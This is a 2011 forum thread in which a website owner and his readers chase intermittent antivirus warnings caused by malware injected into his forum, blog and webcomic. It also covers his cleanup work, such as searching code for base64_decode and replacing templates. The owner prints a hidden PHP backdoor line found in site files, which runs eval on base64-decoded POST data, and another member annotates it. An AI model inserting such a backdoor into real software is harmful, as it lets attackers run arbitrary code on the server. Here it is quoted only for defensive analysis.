Printable Version of Topic

Click here to view this topic in its original format

The Other Side forums - suitable for mature readers! _ Daily life _ Ongoing fight against hackers

Posted by: Mata Apr 19 2011, 10:33 AM

In the last couple of hours I've taken more steps to strengthen this site against hackers, but there will always be vulnerabilities that are harder to catch - basically, legions of hackers in poor countries can make money by finding new holes in code, therefore they always will.

If you get a virus/trojan/etc. warning from this or any of my sites please let me know immediately. Give me as many details as possible, either copy and paste text or with a screenshot of the details of the warning.

I will always try my best to keep this place secure, but there's only so much that can be done by myself and the team here. If you're not running any anti-malware, anti-virus, or a firewall then I highly recommend getting at the very least the Windows security software (which is a lot better than it used to be):

http://www.microsoft.com/en-us/security_essentials/default.aspx

And get your browser vulnerabilities patched with Spybot:

http://www.safer-networking.org/en/index.html

Thanks for your help and patience. If anything comes up then please let me know ASAP!

Posted by: CheeseMoose Apr 19 2011, 10:48 PM

AVG popped these up when Firefox tried to load the RSS feed from your blog.

Posted by: Mata Apr 20 2011, 08:14 AM

Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Posted by: Mata Apr 20 2011, 03:12 PM

I've had a try at fixing that. Could you see if it's worked please?

Posted by: snoo Apr 20 2011, 05:59 PM

AVG is still throwing up a "Threat was blocked" warning occasionally when I come to the forum, forgot to get a shot of it though... will try and remember next time it comes up!

Posted by: Mata Apr 20 2011, 09:17 PM

I got a script hidden in the forum code this afternoon too. It was pretty obscure so was unlikely to be triggered often. Let me know if it happens again please, but hopefully it's fixed.

Posted by: Daria Apr 21 2011, 10:48 AM

After realising that there's no where online I'd host a screenshot of the AVG threat, I messaged it to you on fb, Mata.
It was from the search newposts page.

Posted by: CheeseMoose Apr 21 2011, 11:05 AM

QUOTE (Mata @ Apr 20 2011, 09:14 AM) *
Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Yeah, I think that's got it. At least AVG's not objecting anymore.

Posted by: Mata Apr 21 2011, 11:19 AM

Daria is still seeing it, it seems.

Can anyone get a consistent reproduction of this problem?

Daria, can you get the error if you refresh your cached files? (I'm hoping that the script I found yesterday might have been the problem and it was lurking in your cache... But I think that's wishful thinking.)

Posted by: CheeseMoose Apr 21 2011, 02:31 PM

Speak of the devil, different day, different computer and I get:

Posted by: Mata Apr 21 2011, 02:57 PM

Righty ho, I've finally managed to locate on nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

Posted by: CrazyFooIAintGettinOnNoPlane Apr 22 2011, 06:39 PM

QUOTE (Mata @ Apr 21 2011, 03:57 PM) *
Righty ho, I've finally managed to locate on nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

Hmm... my guess would be its to hijack your admin session.

CODE
if (isset($_GET["cookie"])) {                        // check if a cookie was sent in the request (i.e. user is logged in)
    echo 'cookie=4';                                 // useless
    if (isset($_POST["a9707a3e38"]))                 // check if some POST variable was sent in the HTTP request. You'd have to be redirected here from a malicious site for this to be true
        @eval(base64_decode($_POST["a9707a3e38"]));  // execute it as PHP code
    exit;                                            // useless
}

Posted by: Mata Apr 22 2011, 07:27 PM

We should be good in that regard - the admin sessions are very short on here.

Has anyone had any new problems since yesterday afternoon?

Posted by: Mata Apr 23 2011, 08:25 PM

Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=comic.matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.

I've run scans through my whole server for iframe commands and couldn't find this one. I couldn't find any nasty base64_decode commands either, so I don't think it's concealed in there. I've scanned all of my databases for iframe commands and I don't think it's in there either.

Help! Any suggestions to help find it appreciated.

Posted by: SPEAKERfortheLOST Apr 23 2011, 10:22 PM

If you have the funding, try creating another domain like test.matazone.co.uk and recreate the comic.matazone.co.uk site there.

That way, once it is setup to your liking, you can find if the scan is a remnant of the past infection or if there is an underlying issue to be resolved.

Posted by: Daria Apr 24 2011, 01:46 AM

I got it again today, twice: once on the Mittens Zombie Game, and once on the search new posts page. Forgot to get a screenshot of either one, I'm afraid :/


On a different note, I went back through the Mr Snaffleburger cartoons today because I was showing them to a friend. I found it interesting, Mata, that they were probably a huge influence on how I thought about corporate advertising and capitalism when I was in my early teens. So, thank you!

Posted by: Mata Apr 24 2011, 09:43 AM

I'd deleted the installation of PHPads and the associated database a couple of weeks ago after suspecting that this was the problem, but it seems that somehow the evocation code was somehow compromised. I've no idea how, because the links pointed to a folder on my site and I know for a fact that the folder doesn't exist any more...

Still, I think that this has probably fixed the issue, so you're all back on watch again please - let me know if you see any trojan warnings again please!

Daria: my work here is done biggrin.gif It was a very deliberate choice at the time to try and make people question corporate messages (in an entertaining way). I'm very chuffed that this was effective and honoured that it may have played a tiny part in making you as awesome as you are.

Posted by: Hobbits Apr 24 2011, 10:44 AM

QUOTE (Mata @ Apr 23 2011, 09:25 PM) *
Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=comic.matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.


Your site has been showing up as clear for me, and I haven't had any alerts from virus or spyware software this time around. I've clicked my way through most of the forum and comic pages to see if anything has flagged up but nothing so far. Could it be browser-specific?

Posted by: Mata Apr 24 2011, 07:39 PM

Possibly, but hopefully I've fixed it!

Posted by: Mata Apr 25 2011, 09:18 AM

I've had one report of Kaspersky still being grumpy on my comic. Could people with AVG or Kaspersky clear their cached internet files and refresh the page on my comic please?

I'm really hoping I've got it fixed, but I need to know if it's not. I have never had any warnings with Firefox, Windows Security Essentials, and Spybot blocking script exploits, so I can't see these problems myself. Confirmation one way or another would be appreciated!

Posted by: Pixelgoth Apr 25 2011, 07:50 PM

Got a blocked threat message but don't know how to paste it here sad.gif

Posted by: Mata Apr 26 2011, 07:59 AM

Last night (about midnight UK time) I got desperate and overwrote the entire main layout template for my comic and I hope that's solved the problem there, although I would have much rather found the problem so I could identify it more easily in the future.

Pixie: did you get a warning while on my comic or on these forums? If it's on here then that's going to be a lot harder to fix, and I'm going to have to rest in the hands of Mr Fuzzy on that one. If there's anything nasty lurking on the forums (you know, other than SPS*) then I've got no idea how to find it past what I've already tried.

You can use the 'Prt Sc' button to take a screenshot of whatever is on your screen at the time. You can then paste it into MS Paint (or Photoshop preferably) and save the file. You can then attach the file to a message on Facebook.

*(We love you really, SPS).

Posted by: Mata Apr 29 2011, 11:59 AM

I've had one report of a trojan still lurking on the forums. Has anyone else seen this? It's the same as before: detected with AVG and suggesting that the problem is 'Script Exploit type 1702'. Once again, I can't find anything untoward in the code.

Posted by: CheeseMoose Apr 30 2011, 07:56 AM

Yeah, I've started getting the same messages as above. Only sporadically though, not every time I come on matazone.co.uk, but they can be set off by the forums, the comic, the blog...

Posted by: Mata Apr 30 2011, 12:03 PM

Rargh!

Okay, please take a screen shot with the 'more details' tab revealed, and note the URL and time please. I've got no idea where to start.

I don't know enough about this to say what it could be, but is it possible that there is something on the server itself, not actually on my pages, that is randomly blipping a trojan warning out to any .php page?

Posted by: CheeseMoose Apr 30 2011, 09:11 PM

This happened a couple of minutes ago, so about 10:05pm on 30/04/11. Got the same alerts as before, complaining about www.matazone.co.uk/blog/?feed=rss2 I clicked on the show details button but it just popped up a box saying that the process that generated the alert was firefox.


Posted by: Mata May 1 2011, 09:26 PM

Cool, thanks.

Have you had anything while looking at my comic? If no then that suggests that the issue there could be fixed. Potentially it also means that the problem on my blog could be fixed by overwriting more of the files (the way I fixed the comic) but I don't know which files to overwrite.

I would really love to actually find the code causing the problem, rather than just overwrite it, because if I find it then it would make it much easier to find in the future (or even better, it could make it preventable).

The blog and the comic are updated to the latest versions often within hours of a new release, so they shouldn't be causing issues. It's concerning that they got infected. I'm thinking that maybe there is something lurking in the templates, because they wouldn't get overwritten with the automatic software updates... Then again, if it's the RSS code triggering it, then I've got no idea how it's getting through. sad.gif

I'll keep looking. Thanks for the information!

Posted by: Mata May 1 2011, 09:36 PM

Well, there was a link to a javascript file hosted by Amazon on the blog pages that I never got working properly. I've disabled that, but that's all I can see that I didn't know about. It's possible that someone had hijacked the Amazon script somehow... Maybe?

Let me know if it's still happening please.

Posted by: Mata May 2 2011, 08:24 PM

I've scanned my blog and site several dozen times today and it's come up clean. Any new blips anyone?

Posted by: Mata May 3 2011, 09:44 AM

Ah ha! I've not found it yet, but I think I've got a clue. There are base set-up files for websites, like php.ini, and I think that a randomisation script could have been added into there that occasionally triggers the malicious code. The code doesn't exist on any of my sites, instead it exists on a higher server level. I'm getting my hosts to investigate this possibility now, but I really think that this is the right direction.

I'll let you know if I get any further. Thank you for your patience and support.

Posted by: CheeseMoose May 5 2011, 06:38 PM

I haven't seen an alert for a while. It appears you've got it.

Posted by: Mata May 6 2011, 09:05 AM

Thanks, but I'm actually not convinced. I don't have access to the configuration files that I suspect have been altered. I've got my hosting company investigating those, but they've been very quiet on that front. I hope they've got it completely, but it's more likely they've just disabled the main bit of it otherwise they probably would have told me that it's fixed.

A whole directory of dodgy files was installed on my server last night. I caught it as soon as it happened and we are now investigating to see if we can work out how they were placed there.

The war isn't over yet, but I definitely think that we're going in the right direction.

Posted by: Mata May 6 2011, 11:39 PM

Okay, so a deep scan of the site files found a couple more bits skulking around in the cgi-bin (I don't think they really did anything, but it was good to clear them out), otherwise my server shoudl to spotless.

Let me know if you have anything weird pop up. Also, please let me know if you have had trojan reports of the last month and you don't any more. I need to work out if I've caught everything and crowd sourcing is currently the best method I've got. Thanks!

Posted by: Mata May 16 2011, 09:09 PM

Can anyone confirm that things have been clear over the last couple of weeks please?

Posted by: Spiderhobbes May 16 2011, 10:06 PM

I haven't come across any warnings here for some time but this was the case even when a lot of others were getting warnings coming up. But, from here, everything seems to have been okay the last couple of weeks.

Posted by: Mata May 21 2011, 10:18 AM

Awesome. I'm glad we finally got there. It was a real pain in the bottom trying to get everything. I've got a lot more security on my sites now and I've got monitor systems in place that will let me know if anything is altered without my permission. We should be safe for the time being smile.gif

Even so, I'd like to get this forum updated to more recent software at some point. This isn't the latest version and it would be good to get up to date, so you may see some changes at some point in the future.

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)